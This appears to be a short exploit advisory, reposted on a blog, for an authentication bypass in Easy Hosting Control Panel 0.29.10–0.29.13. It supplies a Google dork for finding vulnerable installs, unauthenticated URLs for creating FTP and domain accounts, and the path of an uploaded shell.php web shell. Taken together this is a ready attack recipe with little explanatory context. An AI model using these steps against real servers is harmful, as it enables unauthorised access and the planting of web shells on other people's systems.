Easy Hosting Control Panel Admin Auth Bypass
# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass |
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount |
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net |
# Version: 0.29.10 - 0.29.13 |
# Tested on: Ubuntu, Debian |
Easy Hosting Control Panel designed for hosting of multiple domains on single machine. |
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional |
to add a ftp account & domain does not require a login. |
http://site.com/vhosts/ehcp/?op=applyforaccount |
http://site.com/vhosts/ehcp/?op=applyforftpaccount |
http://site.com/vhosts/ehcp/?op=applyfordomainaccount |
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php |
No comments:
Post a Comment